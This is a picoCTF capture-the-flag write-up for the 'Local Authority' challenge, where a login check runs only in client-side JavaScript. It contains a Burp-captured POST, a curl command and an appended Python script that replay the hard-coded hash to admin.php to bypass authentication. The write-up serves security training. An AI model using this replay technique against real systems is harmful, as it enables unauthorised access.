## Home (other picoCTF writeups) https://hackmd.io/@sunfrancis12/ry_LLAgp3

Author: [台中教育大學 白帽社 (National Taichung University of Education White Hat Club)](https://hackmd.io/@ntcuhack/index) - sunfrancis12

## Local Authority

This one is really easy. The first thing you see is a login page, so the first thing to do is try logging in.

![](https://hackmd.io/_uploads/HyxHkjHan.png)

Login failed...

![](https://hackmd.io/_uploads/B1rUyiBah.png)

As usual: F12, open the page's resources (Sources) tab, and there is a file called secure.js. Open it. ~~At this point everyone already knows what is going on~~

![](https://hackmd.io/_uploads/H1EY1jrp2.png)

Then open login.php and have a look:

```
// username and password being checked
window.username = "sdds";
window.password = "sds";

// filter() and checkPassword() come from secure.js, i.e. they run in the browser
usernameFilterPassed = filter(window.username);
passwordFilterPassed = filter(window.password);

if ( usernameFilterPassed && passwordFilterPassed ) {
    loggedIn = checkPassword(window.username, window.password);
    if(loggedIn){
        document.getElementById('msg').innerHTML = "Log In Successful";
        // a fixed value is written into the hidden form and sent to admin.php
        document.getElementById('adminFormHash').value = "2196812e91c29df34f5e217cfd639881";
        document.getElementById('hiddenAdminForm').submit();
    }else{
        document.getElementById('msg').innerHTML = "Log In Failed";
    }
}else {
    document.getElementById('msg').innerHTML = "Illegal character in username or password."
}
```

Looks like our guess was right (lol): the password check is done entirely on the client side.

```
loggedIn = checkPassword(window.username, window.password);
```

## Supplement: method 2, curl

This one can also be solved with curl! Looking at the source of login.php (the part not shown in the snippet above), you can see that it puts the value of adminFormHash into an input named hash and POSTs it to admin.php:

```
<form hidden action="admin.php" method="post" id="hiddenAdminForm">
    <input type="text" name="hash" required id="adminFormHash">
</form>

...skipped...

if(loggedIn){
    document.getElementById('msg').innerHTML = "Log In Successful";
    document.getElementById('adminFormHash').value = "2196812e91c29df34f5e217cfd639881";
    document.getElementById('hiddenAdminForm').submit();
}
```

The POST to admin.php looks like this (captured with Burp):

```
POST /admin.php HTTP/1.1
Host: saturn.picoctf.net:50920
Content-Length: 37
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://saturn.picoctf.net:50920
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.50 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://saturn.picoctf.net:50920/login.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

hash=2196812e91c29df34f5e217cfd639881
```

So we can simply use curl to send the same data in a POST to admin.php:

```
curl -X POST http://saturn.picoctf.net:50920/admin.php --data hash=2196812e91c29df34f5e217cfd639881
```

The reason this works is that the only thing admin.php checks is that fixed hash, and the hash is sitting in the page source for anyone to read. Because the actual credential check happens in JavaScript in the browser, the server never verifies a password at all, so knowing the password is unnecessary: read the source, copy the hash, replay the request.
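As an added example that is not part of the original writeup, the following Python script automates method 2: it reads a copy of the login.php response, pulls the hidden form's action and field name and the value the script assigns to adminFormHash out of the HTML, and builds the same `hash=...` POST that the curl command above sends. The HTML embedded below is a constructed sample modelled on the snippets in the writeup, not the real server response; the default host and port are taken from the Burp capture, and `find_flag()` assumes the standard `picoCTF{...}` flag format. No network request is made unless `replay()` is called.

```python
import re
import sys
import urllib.parse
import urllib.request

# Constructed sample of a login.php response, modelled on the snippets in the
# writeup (this is NOT the page returned by the challenge server).
SAMPLE_LOGIN_PAGE = """
<html><body>
<p id="msg"></p>
<form hidden action="admin.php" method="post" id="hiddenAdminForm">
  <input type="text" name="hash" required id="adminFormHash">
</form>
<script src="secure.js"></script>
<script>
window.username = "sdds";
window.password = "sds";
if ( filter(window.username) && filter(window.password) ) {
  loggedIn = checkPassword(window.username, window.password);
  if(loggedIn){
    document.getElementById('msg').innerHTML = "Log In Successful";
    document.getElementById('adminFormHash').value = "2196812e91c29df34f5e217cfd639881";
    document.getElementById('hiddenAdminForm').submit();
  }
}
</script>
</body></html>
"""


def extract_hidden_form(html):
    """Return (action, input_name) of the hidden form that the script submits."""
    form = re.search(r'<form[^>]*id="hiddenAdminForm"[^>]*>(.*?)</form>', html, re.S)
    if not form:
        raise ValueError("hiddenAdminForm not found in page")
    action = re.search(r'action="([^"]+)"', form.group(0)).group(1)
    field = re.search(r'<input[^>]*name="([^"]+)"[^>]*id="adminFormHash"', form.group(1)).group(1)
    return action, field


def extract_token(html):
    """Return the static value the client-side script writes into adminFormHash."""
    m = re.search(r"getElementById\('adminFormHash'\)\.value\s*=\s*\"([0-9a-f]{32})\"", html)
    if not m:
        raise ValueError("adminFormHash assignment not found in page")
    return m.group(1)


def build_replay(html):
    """Return (path, urlencoded body); equivalent to the curl command in the writeup."""
    action, field = extract_hidden_form(html)
    return action, urllib.parse.urlencode({field: extract_token(html)})


def find_flag(body):
    """Assumes the usual picoCTF flag format; returns the flag or None."""
    m = re.search(r"picoCTF\{[^}]*\}", body)
    return m.group(0) if m else None


def replay(base_url, html=SAMPLE_LOGIN_PAGE, timeout=10):
    """POST the recovered hash to the form's action under base_url; returns the body.

    This is the only function that touches the network. base_url is an assumption
    (e.g. "http://saturn.picoctf.net:50920/" from the Burp capture).
    """
    action, body = build_replay(html)
    req = urllib.request.Request(urllib.parse.urljoin(base_url, action),
                                 data=body.encode(), method="POST")
    req.add_header("Content-Type", "application/x-www-form-urlencoded")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode(errors="replace")


if __name__ == "__main__":
    # usage: python replay_hash.py <base_url> [saved_login_page.html]
    base = sys.argv[1] if len(sys.argv) > 1 else "http://saturn.picoctf.net:50920/"
    page = open(sys.argv[2]).read() if len(sys.argv) > 2 else SAMPLE_LOGIN_PAGE
    response = replay(base, page)
    print(find_flag(response) or response)
```

Save the login.php response from the browser (or Burp) to a file and pass it as the second argument; with no file, the script falls back to the constructed sample, which carries the same hash the writeup found. Parsing the hash out of the page rather than hard-coding it is what makes the same script reusable against any instance of the challenge.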